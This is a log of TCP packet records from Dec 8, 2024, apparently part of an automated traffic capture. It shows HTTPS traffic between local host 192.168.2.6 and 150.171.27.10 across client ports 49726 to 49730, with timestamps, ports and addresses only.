Dec 8, 2024 13:31:20.341993093 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.342000961 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.342039108 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.342061996 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.342830896 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.342892885 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.342897892 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.342987061 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.343023062 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.343043089 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.343075037 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.343080044 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.343111992 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.343122959 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.346654892 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.346673012 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.346714973 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.346723080 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.346751928 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.346766949 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.347693920 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.347743988 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.347762108 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.347767115 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.347806931 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.351603031 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.351620913 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.351663113 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.351670980 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.351701975 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.351727962 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.352643967 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.352664948 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.352718115 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.352725029 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.352754116 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.352772951 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.358068943 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.358088017 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.358135939 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.358143091 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.358237982 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.359674931 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.359692097 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.359740019 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.359747887 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.359780073 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.359805107 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.361061096 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.361078978 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.361140966 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.361150026 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.361197948 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.361439943 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.361462116 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.361500978 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.361507893 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.361537933 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.361547947 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369342089 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369358063 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369404078 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369405985 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369415045 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369425058 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369463921 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369465113 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369471073 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369491100 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369517088 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369888067 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369904041 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369939089 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.369942904 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.369982004 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.370110989 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.374936104 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.374953032 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.374996901 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.375004053 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.375040054 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.377964973 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.377980947 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.378040075 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.378048897 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.378082037 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.378166914 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.378186941 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.378227949 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.378235102 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.378261089 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.378274918 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.380321980 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.380338907 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.380404949 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.380414009 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.380486012 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.385729074 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.385751009 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.385798931 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.385806084 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.385835886 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.385854006 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.386626959 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.386642933 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.386719942 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.386729956 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.386768103 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.387026072 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.387046099 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.387075901 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.387084961 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.387125015 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.387136936 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.389709949 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.389730930 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.389786005 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.389794111 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.389836073 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.394490004 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.394517899 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.394556999 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.394562006 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.394603968 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.395843983 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.395862103 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.395914078 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.395921946 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.395970106 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.401257038 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.401300907 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.401315928 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.401321888 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.401379108 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.401741028 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.401757956 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.401819944 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.401827097 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.401865005 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.411386967 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.411406994 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.411465883 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.411473989 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.411516905 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.413963079 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.413980961 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.414040089 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.414048910 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.414088011 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.421365023 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.421381950 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.421427011 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.421433926 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.421466112 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.421480894 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.428031921 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.428047895 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.428105116 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.428117037 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.428165913 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.439095020 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.439168930 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.439176083 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.439239979 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.445415974 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.445493937 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.445499897 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.445549011 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.451297998 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.451364040 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.451369047 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.451459885 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.459695101 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.459783077 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.459788084 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.459827900 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.464544058 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.464621067 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.464626074 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.464662075 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.468981028 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.469048023 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.469052076 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.469091892 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.475672960 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.475739002 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.475745916 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.475780010 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.480593920 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.480691910 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.480699062 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.480796099 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.485754013 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.485819101 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.485826015 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.485903978 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.492233038 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.492301941 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.492309093 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.492459059 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.496454000 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.496515989 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.496521950 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.496561050 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.503046989 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.503118992 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.503125906 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.503165960 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.508038044 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.508109093 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.508119106 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.508173943 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.514620066 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.514682055 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.514688015 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.514792919 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.519572020 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.519634008 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.519639015 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.519706964 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.523914099 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.523938894 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.523981094 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.523991108 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.524035931 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.524054050 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.524132013 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.524152040 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.524188995 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.524200916 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.524214983 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.524240017 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.524712086 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.524775982 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.524780989 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.524836063 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.526158094 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.526180983 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.526228905 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.526237965 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.526257038 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.526278019 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.531382084 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.531402111 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.531457901 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.531464100 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.531476021 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.531512022 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.531516075 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.531528950 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.531563997 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.531582117 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.531595945 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.531624079 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.536045074 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.536066055 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.536102057 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.536108971 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.536134958 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.536154985 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.536720037 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.536737919 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.536791086 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.536798000 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.536813974 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.536837101 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.538834095 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.538855076 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.538904905 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.538909912 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.538919926 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.539052963 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.539261103 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.539278030 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.539300919 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.539338112 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.539344072 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.539566994 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.544327974 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.544348955 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.544395924 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.544403076 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.544419050 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.544440985 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.545335054 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.545352936 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.545393944 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.545402050 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.545423985 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.545439959 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.546364069 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.546382904 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.546421051 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.546426058 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.546449900 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.546471119 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.547199965 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.547216892 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.547261000 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.547267914 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.547291994 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.547306061 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.552961111 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.553020954 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.553034067 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.553040028 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.553066969 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.553091049 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.553586960 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.553611040 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.553642988 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.553647995 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.553675890 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.553715944 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.554620028 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.554636002 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.554744959 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.554744959 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.554754972 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.554922104 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.555341959 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.555360079 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.555397034 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.555404902 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.555432081 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.555455923 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.560053110 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.560070038 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.560112000 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.560118914 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.560132027 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.560208082 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.560262918 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.560282946 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.560316086 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.560321093 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.560342073 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.560369015 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.561893940 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.561909914 CET	443	49728	150.171.27.10	192.168.2.6
